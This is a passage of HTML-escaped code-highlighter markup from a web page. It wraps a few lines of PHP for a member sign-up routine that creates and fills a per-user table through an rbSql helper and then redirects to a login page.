style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-e&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;rbSql&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-s&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(221, 17, 68) !important;&quot;&gt;&quot;create&quot;&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;crayon-s&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(221, 17, 68) !important;&quot;&gt;&quot;member_&quot;&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$uid&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;crayon-s&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(221, 17, 68) !important;&quot;&gt;&quot;id&quot;&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;crayon-s&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(221, 17, 68) !important;&quot;&gt;&quot;mail&quot;&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;crayon-s&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(221, 17, 68) !important;&quot;&gt;&quot;pw&quot;&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;crayon-s&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(221, 17, 68) !important;&quot;&gt;&quot;ip&quot;&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;crayon-s&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(221, 17, 68) !important;&quot;&gt;&quot;lvl&quot;&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;]&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line&quot; id=&quot;crayon-5c677473e1a5a263262138-63&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span class=&quot;crayon-st&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: bold !important;&quot;&gt;if&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-e&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;is_string&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$ret&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-e&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;error&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-s&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(221, 17, 68) !important;&quot;&gt;&quot;error : create&quot;&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line crayon-striped-line&quot; id=&quot;crayon-5c677473e1a5a263262138-64&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$ret&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-e&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;rbSql&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-s&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(221, 17, 68) !important;&quot;&gt;&quot;insert&quot;&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;crayon-s&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(221, 17, 68) !important;&quot;&gt;&quot;member_&quot;&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$uid&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$uid&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$umail&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$upw&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$uip&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;crayon-s&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(221, 17, 68) !important;&quot;&gt;&quot;1&quot;&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;]&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line&quot; id=&quot;crayon-5c677473e1a5a263262138-65&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span class=&quot;crayon-st&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: bold !important;&quot;&gt;if&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-e&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;is_string&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$ret&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-e&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;error&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-s&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(221, 17, 68) !important;&quot;&gt;&quot;error : insert&quot;&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line crayon-striped-line&quot; id=&quot;crayon-5c677473e1a5a263262138-66&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span class=&quot;crayon-k &quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;exit&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-s&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(221, 17, 68) !important;&quot;&gt;&quot;&amp;lt;script&amp;gt;location.href='./?page=login';&amp;lt;/script&amp;gt;&quot;&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line&quot; id=&quot;crayon-5c677473e1a5a263262138-67&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;}&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line crayon-striped-line&quot; id=&quot;crayon-5c677473e1a5a263262138-68&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span class=&quot;crayon-st&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: bold !important;&quot;&gt;else&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-e&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;error&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-s&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(221, 17, 68) !important;&quot;&gt;&quot;join fail&quot;&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line&quot; id=&quot;crayon-5c677473e1a5a263262138-69&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;}&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line crayon-striped-line&quot; id=&quot;crayon-5c677473e1a5a263262138-70&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span class=&quot;crayon-st&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: bold !important;&quot;&gt;elseif&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; 